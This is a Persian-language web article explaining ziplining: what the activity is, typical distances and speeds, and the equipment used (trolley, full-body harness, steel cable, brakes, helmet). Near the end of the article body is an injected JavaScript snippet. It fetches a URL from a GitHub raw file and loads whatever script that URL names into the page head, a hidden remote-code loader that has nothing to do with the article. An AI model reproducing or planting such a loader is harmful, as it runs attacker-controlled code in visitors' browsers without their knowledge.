زیپ لاین

  • زیپ لاین، تفریحی پر هیجان است که دوست داران سرعت و دلهره را در ارتفاع به چالش می کشد. برای این تجربه باید ترس را کنار بگذارید.

    زیپ لاین چیست؟

    بسیاری از جوانان و نوجوانان و حتی بزرگسالان هم از این فعالیت فرا ورزشی که میزان آدرنالینشان را افسایش می یابد و باعث می شود انرژی خود را تخلیه کنند. فرا ورزش به فعالیت های گفته می شود که میزان هیجان آنها بیش از ورزش باشد. در زیپ لاین شما مسافتی را بین دو نقطه با ارتفاع متفاوت ار سطح زمین را در حالت معلق به پایین سر می خورید. دو ریسمان بلند فولادی به این دونقطه مرتفع ثابت می شوند و اتصال شماه به ریسمان از طریق لباس مخصوص یا صندلی بند پرواز متصل به قرقره های بزرگ است.

    اساس کار این ابزار مبتنی بر نیروی گرانش زمین است و سرعت گرفتن در مسیر، تحت کنترل افراد نیست.

    میزان مسافتی که در طول لاین پرواز طی می کنید بسته به منطقه جغرافیایی و ظرفیت های آن متفاوت هستند؛ اما بیشتر زیپ لاین ها مسافتی بین ۵۰۰ تا ۱۲۰۰ متر دارند. سرعت حرکت در بند پرواز نیز بسته به اختلاف ارتفاع نقطه شروع و پایان و شیب مسیر و وزن افراد، متفاوت خواهد بود. سرعت متوسط بیشتر زیپ لاین ها در حدود ۶۰ تا ۸۰ کیلومتر در ساعت است. البته در نقاط مختلف دنیا، شیب های تند، سرعت حرکت افراد را تا ۱۶۰ کیلومتر در ساعت هم می رسانند، که هیجان آن به شدت بالا است.

    ابزار و تجهیزات بند پرواز

    ابزار مورد استفاده در زیپ لاین شامل ترولی یا قرقره، هارنس تمام تنه (تونیک‌های مخصوص صخره نوردی) و سیم بکسل یا سیم فولادی ضد زنگ می شود.

    ترولی متشکل از چند چرخ و قرقره برای قرار گرفتن روی سیم فولادی مسیر و کم کردن اصطکاک حرکتی است. هارنس به‌وسیله تسمه های محکم و مخصوصی به ترولی وصل می‌شود و امنیت شما را در مسیر تامین می‌کند. ترمزها کاملا اتوماتیک هستند؛ اما در بعضی بند پرواز ها برای جلوگیری از ترس احتمالی و هیجان بالا در بعضی افراد ترمز دستی تعبیه شده است که در صورت استفاده، فرد در میانه راه متوقف می شود. برای ثابت کردن دو سر سیم فولادی مسیر، از سازه‌های بزرگ استفاده می کنند. درهنگام پوشیدن هاربس و آماده حرکت شدن، پوشیدن دستکش و کلاه ایمنی را فراموش نکنید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۴ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید